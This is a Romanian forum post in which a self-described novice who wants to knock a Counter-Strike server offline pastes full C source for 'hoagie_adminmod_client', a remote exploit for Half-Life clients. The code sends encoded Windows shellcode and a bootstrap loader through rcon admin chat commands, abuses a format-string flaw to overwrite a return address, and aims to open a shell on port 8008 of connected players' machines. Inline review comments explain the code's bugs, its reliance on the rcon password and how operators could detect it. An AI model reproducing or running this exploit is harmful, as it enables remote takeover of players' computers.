Care ma poate ajuta si pe mine?? ;;).....am gasit un "script"..(nu stiu ce e :D ) si nu stiu cum se foloseste...m-ar interesa foarte foarte tare k vreau sa dau jos un server d cs :D / / / i know i'm a n00b
#include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <unistd.h> #include <netinet/in.h> #include <arpa/inet.h> #include <stdio.h> #include <errno.h> #include <string.h>
/* Connection parameters. They are filled in main() from argv with unbounded
 * strcpy(); the 20/30-byte sizes are never checked against the argument
 * lengths, so over-long arguments overrun these globals. */
char server_ip[20]; char rcon_pwd[30]; int server_port; char player_nick[30];
/* Hard-coded absolute address that main() (step 3) adds to its computed offset.
 * NOTE(review): presumably specific to one client build (the header comment
 * lists build-specific import-table addresses), so it is not portable. */
#define STRADDR 0x19d4588
/* -- portable NT/2k/XP ShellCode features ...
LoadLibraryA IT address 004AC2E0h GetProcAddress IT address 004AC164h XOR byte 9Fh Remote port 8008 Style C
ATTENTION code modified by greuff: 0xff in the first line changed to 0xfe because the HL-client filters out this character.
Wrote a short bootstrap loader that changes this byte again to 0xff. (dec %esp, dec %esp, dec %esp, dec %esp, pop %esi, incb 0xf(%esi))
It additionally corrects the single '%' in the code that is filtered out by the format-string-function. (offset 0x65)
Works only when the code gets executed by a ret! (buffer- address has to lie on the stack)
*/
// total length: 1226 bytes char *shellcode[] = { "x90x90x90x4cx4cx4cx4cx5exfex46x15xfex46x6b" "x68x5ex56xc3x90x54x59xfexd1x58x33xc9xb1x1c" "x90x90x90x90x03xf1x56x5fx33xc9x66xb9x95x04" "x90x90x90xacx34x9fxaaxe2xfax77x9fx9fx9fx9f",
"xc2x1ex72x46xbexdfx9fx12x2ax6dxbbxdfx9fx12" "x22x65xbbxdfx9fxf5x98x0fx0fx0fx0fxc6x77x4d" "x9dx9fx9fx12x2axb5xbaxdfx9fx12x22xacxbaxdf" "x9fxf5x95x0fx0fx0fx0fxc6x77x24x9dx9fx9fxf5",
"x9fx12x2ax46xbaxdfx9fxc9x12x2ax7axbaxdfx9f" "xc9x12x2ax76xbaxdfx9fxc9x60x0axacxbaxdfx9f" "xf5x9fx12x2ax46xbaxdfx9fxc9x12x2ax72xbaxdf" "x9fxc9x12x2ax6exbaxdfx9fxc9x60x0axacxbaxdf",
"x9fx58x1ax6axbaxdfx9fxdbx9fx9fx9fx12x2ax6a" "xbaxdfx9fxc9x60x0axa8xbaxdfx9fx12x2axb2xb9" "xdfx9fx32xcfx60x0axccxbaxdfx9fx12x2axaexb9" "xdfx9fx32xcfx60x0axccxbaxdfx9fx12x2ax6exba",
"xdfx9fx12x22xb2xb9xdfx9fx3ax12x2ax7axbaxdf" "x9fx32x12x22xaexb9xdfx9fx34x12x22xaaxb9xdf" "x9fx34x58x1axbaxb9xdfx9fx9fx9fx9fx9fx58x1a" "xbexb9xdfx9fx9ex9ex9fx9fx12x2axa6xb9xdfx9f",
"xc9x12x2ax6axbaxdfx9fxc9xf5x9fxf5x9fxf5x8f" "xf5x9exf5x9fxf5x9fx12x2axd6xb9xdfx9fxc9xf5" "x9fx60x0axa4xbaxdfx9fxf7x9fxbfx9fx9fx0fxf7" "x9fx9dx9fx9fx60x0axdcxbaxdfx9fx16x1axcexb9",
"xdfx9fxacx5fxcfxdfxcfxdfxcfx60x0ax65xbbxdf" "x9fxcfxc4xf5x8fx12x2ax56xbaxdfx9fxc9xccx60" "x0ax61xbbxdfx9fxf5x9cxccx60x0ax9dxbaxdfx9f" "x12x2axcaxb9xdfx9fxc9x12x2ax56xbaxdfx9fxc9",
"xccx60x0ax99xbaxdfx9fx12x22xc6xb9xdfx9fx34" "xacx5fxcfx12x22xfaxb9xdfx9fxc8xcfxcfxcfx12" "x2ax76xbaxdfx9fx32xcfx60x0axa0xbaxdfx9fxf5" "xafx60x0axd0xbaxdfx9fx74xd2x0fx0fx0fxacx5f",
"xcfx12x22xfaxb9xdfx9fxc8xcfxcfxcfx12x2ax76" "xbaxdfx9fx32xcfx60x0axa0xbaxdfx9fxf5xcfx60" "x0axd0xbaxdfx9fx1cx22xfaxb9xdfx9fx9dx90x1d" "x88x9ex9fx9fx1ex22xfaxb9xdfx9fx9exbfx9fx9f",
"xedx91x0fx0fx0fx0fx58x1axfaxb9xdfx9fx9fxbf" "x9fx9fxf5x9fx14x1axfaxb9xdfx9fx12x22xfaxb9" "xdfx9fxc8xcfx14x1axcexb9xdfx9fxcfx12x2ax76" "xbaxdfx9fx32xcfx60x0axd8xbaxdfx9fxf5xcfx60",
"x0axd0xbaxdfx9fx14x1axfaxb9xdfx9fxf5x9fxcf" "x12x2axcexb9xdfx9fx32xcfx12x2axc6xb9xdfx9f" "x32xcfx60x0ax95xbaxdfx9fxf5x9fx12x22xfaxb9" "xdfx9fxc8xf5x9fxf5x9fxf5x9fx12x2ax76xbaxdf",
"x9fx32xcfx60x0axa0xbaxdfx9fxf5xcfx60x0axd0" "xbaxdfx9fxacx56xa6x12xfaxb9xdfx9fx90x18xf8" "x60x60x60xf5x9fxf7x9fxbfx9fx9fx0fx12x2axce" "xb9xdfx9fx32xcfx12x2axc6xb9xdfx9fx32xcfx60",
"x0ax91xbaxdfx9fx16x1axfexb9xdfx9fxf5x9fx12" "x22xfaxb9xdfx9fxc8xcfx12x2axcexb9xdfx9fx32" "xcfx12x2ax72xbaxdfx9fx32xcfx60x0axd4xbaxdf" "x9fxf5xcfx60x0axd0xbaxdfx9fxf5x9fx14x1axfe",
"xb9xdfx9fx12x22xfaxb9xdfx9fxc8xcfx14x1axce" "xb9xdfx9fxcfx12x2ax76xbaxdfx9fx32xcfx60x0a" "xd8xbaxdfx9fxf5xcfx60x0axd0xbaxdfx9fx76x26" "x61x60x60x12x2axc6xb9xdfx9fx32xcfx60x0ax8d",
"xbaxdfx9fx12x2axc2xb9xdfx9fx32xcfx60x0ax8d" "xbaxdfx9fxf5x9fx60x0axc8xbaxdfx9fxcexc9xf7" "x7fx5dxd5x9fx0fxc5x60x8dxcfxc4xc6xc8xc1xce" "xc9xccxf7xfbx5exd5x9fx0fxc5x60x8dxcfx33x1b",
"x5fxeax64xc7x34xc6x7dx76x5cxc8xccxd0xdcxd4" "xacxadx9fxecxf0xfcxf4xfaxebx9fxfdxf6xf1xfb" "x9fxf3xf6xecxebxfaxf1x9fxfexfcxfcxfaxefxeb" "x9fxecxfaxf1xfbx9fxedxfaxfcxe9x9fxfcxf3xf0",
"xecxfaxecxf0xfcxf4xfaxebx9fxd4xdaxcdxd1xda" "xd3xacxadx9fxdcxedxfaxfexebxfaxcfxf6xefxfa" "x9fxd8xfaxebxccxebxfexedxebxeaxefxd6xf1xf9" "xf0xdex9fxdcxedxfaxfexebxfaxcfxedxf0xfcxfa",
"xecxecxdex9fxcfxfaxfaxf4xd1xfexf2xfaxfbxcf" "xf6xefxfax9fxd8xf3xf0xfdxfexf3xdexf3xf3xf0" "xfcx9fxcdxfaxfexfbxd9xf6xf3xfax9fxc8xedxf6" "xebxfaxd9xf6xf3xfax9fxccxf3xfaxfaxefx9fxdc",
"xf3xf0xecxfaxd7xfexf1xfbxf3xfax9fxdaxe7xf6" "xebxcfxedxf0xfcxfaxecxecx9fxdcxf0xfbxfaxfb" "xbfxfdxe6xbfxe3xc5xfexf1xbfxa3xf6xe5xfexf1" "xdfxfbxfaxfaxefxe5xf0xf1xfaxb1xf0xedxf8xa1",
"x9dx9fx80xd7x9fx9fx9fx9fx9fx9fx9fx9fx9fx9f" "x9fx9fx93x9fx9fx9fx9fx9fx9fx9fx9ex9fx9fx9f" "x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f" "x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f",
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f" "x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f" "x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f" "x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f",
"x9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f" "x9fx9fxdcxd2xdbxb1xdaxc7xdax9fx9fx9fx9fx9f" "x8fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9fx9f" "x9fx9fx9fx9fx9fx9fx96x96x96x96x96x90x90x90"}; // = 22 blocks
/* Data sent by main() in step 2 (after the 22 fragments of step 1); like the
 * fragments it is pushed as text inside an admin_command rcon line. */
char loader[]= "x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x4cx4cx4cx4cx5ax31xc9xb1x27x42xe2" "xfdx52x31xc0x31xc9x66xbbx38x16x88xf9x51x88" "xd9x40x8ax3cx42x88x3ax42xe2xf8x59xe2xf1xc3";
/* Open an unconnected UDP socket into *sock. host and port are parsed into a
 * local sockaddr that is never used afterwards (the destination is re-parsed
 * on every send in lowlevel_rcon()), so only the socket() call has an effect.
 * NOTE(review): inet_aton() reports failure by returning 0, not a negative
 * value, so the "<0" test never rejects a malformed host string. Both failure
 * paths exit(1) after perror(). */
void create_conn(int *sock, char *host, int port) { struct sockaddr_in sin; sin.sin_family=AF_INET; sin.sin_port=htons(port); if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1); if((*sock=socket(PF_INET,SOCK_DGRAM,0))<0) perror("socket"), exit(1); }
/* Send one raw out-of-band datagram (four 0xff bytes followed by cmd) to
 * host:port over sock. When reply is non-NULL, block for one datagram back and
 * copy its payload (everything after the 4-byte prefix) into reply.
 *
 * Risk for whoever runs this tool: the answer is trusted completely. Up to
 * 2000 bytes are received into msg, recvfrom() does not NUL-terminate them, the
 * addrlen argument (dummy) is passed uninitialised, and the payload is then
 * strcpy()'d into reply, whose size is unknown here (callers pass a 1000-byte
 * array). A hostile or misbehaving server can therefore overflow the caller's
 * buffer. There is no timeout on recvfrom(), so a silent server hangs the
 * program; fdset is declared but never used. All error paths exit(1). */
void lowlevel_rcon(int sock, char *host, int port, char *cmd, char *reply) { char msg[100000]; struct sockaddr_in sin; struct sockaddr_in sfrom; fd_set fdset; int dummy;
/* Destination is rebuilt on every call; same ineffective inet_aton() check as in create_conn(). */
sin.sin_family=AF_INET; sin.sin_port=htons(port); if(inet_aton(host,&(sin.sin_addr.s_addr))<0) perror("inet_aton"), exit(1);
/* strlen(msg) is used as the length, so cmd must be NUL-terminated and contain no embedded NULs. */
sprintf(msg,"%c%c%c%c%s",0xff,0xff,0xff,0xff,cmd); if(sendto(sock,msg,strlen(msg),0,(struct sockaddr *)&sin,sizeof(sin))<0) perror("sendto"), exit(1);
if(reply) { if(recvfrom(sock,msg,2000,0,(struct sockaddr *)&sfrom,&dummy)<0) perror("recvfrom"), exit(1);
if(strncmp(msg,"xFFxFFxFFxFF",4)) fprintf(stderr,"protocol error: replyn"), exit(1);
/* Unbounded copy of server-controlled data; see the header comment. */
strcpy(reply,msg+4); } }
/* Perform the two-step rcon exchange: ask for "challenge rcon", then send
 * rcon <challenge> "<rconpwd>" <cmd>. When reply_fun is non-NULL the server's
 * answer to the command is strcpy()'d into it.
 *
 * The rcon password is sent in clear text over UDP, so anyone on the path can
 * read it. reply (1000 bytes) is filled by lowlevel_rcon() without a bound;
 * reply[strlen(reply)-1]=0 indexes before the array on an empty reply; msg is
 * built with sprintf() from rconpwd and cmd with no length checks; and the
 * final strcpy() into reply_fun assumes the caller's buffer is large enough. */
void send_rcon(int sock, char *host, int port, char *rconpwd, char *cmd, char *reply_fun) { char reply[1000]; char msg[100000];
/* The challenge is everything after "challenge rcon " minus the trailing character. */
lowlevel_rcon(sock,host,port,"challenge rcon",reply); if(!strstr(reply,"challenge rcon ")) fprintf(stderr,"protocol errorn"), exit(1); reply[strlen(reply)-1]=0;
sprintf(msg,"rcon %s "%s" %s",reply+strlen("challenge rcon "),rconpwd,cmd); if(reply_fun) lowlevel_rcon(sock,host,port,msg,reply); else lowlevel_rcon(sock,host,port,msg,NULL); if(reply_fun) strcpy(reply_fun,reply); }
/* Entry point. Usage: server_ip server_port rcon_password [player_nick].
 *
 * What this tool needs and what it hits: it only works with a valid rcon
 * password, i.e. administrative control of the game server is already in hand,
 * and everything it sends is an admin_command admin_psay/admin_ssay chat line
 * that the server relays to its connected *clients* (the closing message
 * refers to a client host). It does not take a server down; it targets the
 * players of a server the operator already administers. On the wire a server
 * operator sees a normal rcon challenge/response followed by admin_command
 * lines carrying oversized %<n>u width specifiers, which is straightforward to
 * log and alert on.
 *
 * argv[1], argv[3] and argv[4] are copied into 20/30-byte globals with
 * strcpy() and no length check; server_port comes from strtol() with no error
 * check; anzsc is declared but never used. */
int main(int argc, char **argv) { int sock, i,j; int anzsc; char reply[1000], command[100]; char evil_message[100000]; unsigned int offset, spaces; unsigned long addr;
printf("hoagie_adminmod_client - remote exploit for half-life-clientsn"); printf("by nn"); if(argc<4 || argc>5) { printf("Usage: %s server_ip server_port rcon_password [player_nick]nn",argv[0]); exit(1); }
/* Copy arguments into the fixed-size globals (unbounded) and choose the admin command. */
strcpy(server_ip,argv[1]); server_port=strtol(argv[2],NULL,10); strcpy(rcon_pwd,argv[3]); if(argc==5) { strcpy(player_nick,argv[4]); sprintf(command,"admin_command admin_psay "%s"",player_nick); } else { player_nick[0]=0; sprintf(command,"admin_command admin_ssay"); }
if(player_nick[0]==0) { printf("Sending to ALL clients! You have 3 sec to abort...n"); sleep(3); }
create_conn(&sock,server_ip,server_port);
/********* Step 1 - send the complete shellcode and the loader to the big buffer ***********/
/* reply doubles as a scratch buffer for the fragment and as the reply buffer handed to send_rcon(). */
offset=5000+112/2; spaces=0; for(i=21;i>=0;i--) { sprintf(evil_message,"%s ",command); for(j=0;j<spaces;j++) strcat(evil_message," "); sprintf(reply,"%%%du%s",offset,shellcode[i]); strcat(evil_message,reply);
printf("Writing shellcode fragment at offset %d...n",offset); send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply); offset-=strlen(shellcode[i])+2; // including x0ax00 }
/********* Step 2 - send the shellcode bootstrap loader ***********/
/* correct offset because the shell loader has the double size of a shellcode chunk */ offset-=strlen(shellcode[0]); sprintf(evil_message,"%s ",command); for(j=0;j<spaces;j++) strcat(evil_message," "); sprintf(reply,"%%%du%s",offset,loader); strcat(evil_message,reply);
printf("Writing bootstrap at offset %d...n",offset); send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);
/********* Step 3 - construct the code that returns into the shellcode ************/
/* addr depends on the hard-coded STRADDR, so this step is tied to one client build. */
addr=STRADDR+offset+73+spaces; sprintf(evil_message,"%s AA%c%c%c%c%c%c%%.f%%.f%%.f%%.f%%.f%%.%du%%n", command, 0x68,addr&0xFF,(addr>>8)&0xFF,(addr>>16)&0xFF,(addr>>24)&0xFF,0xc3,734 /* 0x3cd-13 */); printf("Writing return into shellcode instructions...n"); send_rcon(sock,server_ip,server_port,rcon_pwd,evil_message,reply);
close(sock);
printf("Shell (hopefully) spawned at client host port 8008.n"); return 0; }